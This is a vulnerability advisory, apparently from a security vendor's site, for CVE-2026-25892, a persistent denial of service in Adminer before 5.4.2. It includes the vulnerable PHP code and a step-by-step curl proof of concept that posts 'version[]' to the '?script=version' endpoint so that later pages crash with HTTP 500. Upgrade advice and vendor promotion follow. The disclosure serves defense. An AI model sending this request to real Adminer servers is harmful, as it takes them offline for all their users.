CVE-2026-25892

CVE-2026-25892 is a high-severity improper input validation vulnerability in vrana/adminer (composer), affecting versions >= 4.6.2, < 5.4.2. It is fixed in 5.4.2.

Summary

Adminer v5.4.1 has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users.

Details

1. Intended design of ?script=version:

The endpoint is designed to receive version data from adminer.org via browser JavaScript:

  • functions.js line 102-117: Creates iframe to https://www.adminer.org/version/
  • Adminer.org sends signed version data via postMessage
  • JavaScript POSTs this to ?script=version
  • Server stores in /tmp/adminer.version for signature verification
// functions.js line 117
ajax(url + 'script=version', () => { }, event.data + '&token=' + token);

2. The vulnerability:

The endpoint only checks $_GET["script"] == "version" - it does not validate:

  • Request origin (no CSRF token check for this endpoint)
  • Request source (any HTTP client can POST)
  • Parameter types (version expected as string, array not rejected)
// bootstrap.inc.php line 32-40
if ($_GET["script"] == "version") {
    $filename = get_temp_dir() . "/adminer.version";
    @unlink($filename);
    $fp = file_open_lock($filename);
    if ($fp) {
        file_write_unlock($fp, serialize(array("signature" => $_POST["signature"], "version" => $_POST["version"])));
    }
    exit;
}

3. Type confusion crash:

When POST contains version[] instead of version, PHP creates an array. When Adminer reads this file and passes to openssl_verify():

// design.inc.php line 75
if (openssl_verify($version["version"], base64_decode($version["signature"]), $public) == 1) {

PHP 8.x throws:

TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given

PoC

Steps to Reproduce:

Step 1: Verify Adminer is running and accessible.

curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.php

Expected output:

200

Step 2: Send the malicious POST request. The version[] syntax causes PHP to create an array instead of a string.

curl -X POST "http://localhost:8888/adminer-5.4.1.php?script=version" \
     -d "signature=x&version[]=INJECTED"

Expected output: Empty response (no error).

Step 3: Access Adminer again to trigger the crash.

curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.php

Expected output:

500

Step 4: (Optional) View the PHP error in server logs.

PHP Fatal error:  Uncaught TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given in adminer-5.4.1.php:1386

Step 5: (Optional) Inspect the poisoned file.

cat /tmp/adminer.version

Expected output:

a:2:{s:9:"signature";s:1:"x";s:7:"version";a:1:{i:0;s:8:"INJECTED";}}

Recovery:

rm /tmp/adminer.version

After deletion, Adminer returns HTTP 200.

Impact

Type: Denial of Service

Root cause: The ?script=version endpoint is designed to receive data from adminer.org via JavaScript, but lacks server-side validation. Any HTTP client can POST directly to this endpoint. Combined with missing type validation before openssl_verify(), this allows persistent DoS.

Affected users: Any Adminer instance accessible over the network.

The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. Typical impact: varies by context: data corruption, logic bypass, or denial of service.

CVE-2026-25892 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.4.2); upgrading removes the vulnerable code path.

Affected versions

vrana/adminer (>= 4.6.2, < 5.4.2)

Security releases

vrana/adminer → 5.4.2 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade to Adminer 5.4.2.

Mitigation (if you can't upgrade): Make file adminer.version in temp directory (usually the value of upload_tmp_dir) unwritable by web server.

Frequently Asked Questions

  1. What is CVE-2026-25892? CVE-2026-25892 is a high-severity improper input validation vulnerability in vrana/adminer (composer), affecting versions >= 4.6.2, < 5.4.2. It is fixed in 5.4.2. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
  2. How severe is CVE-2026-25892? CVE-2026-25892 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of vrana/adminer are affected by CVE-2026-25892? vrana/adminer (composer) versions >= 4.6.2, < 5.4.2 is affected.
  4. Is there a fix for CVE-2026-25892? Yes. CVE-2026-25892 is fixed in 5.4.2. Upgrade to this version or later.
  5. Is CVE-2026-25892 exploitable, and should I be worried? Whether CVE-2026-25892 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-25892 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-25892? Upgrade vrana/adminer to 5.4.2 or later.

Other vulnerabilities in vrana/adminer

CVE-2025-43960CVE-2021-43008CVE-2021-29625CVE-2018-7667CVE-2021-21311

Stop the waste.
Protect your environment with Kodem.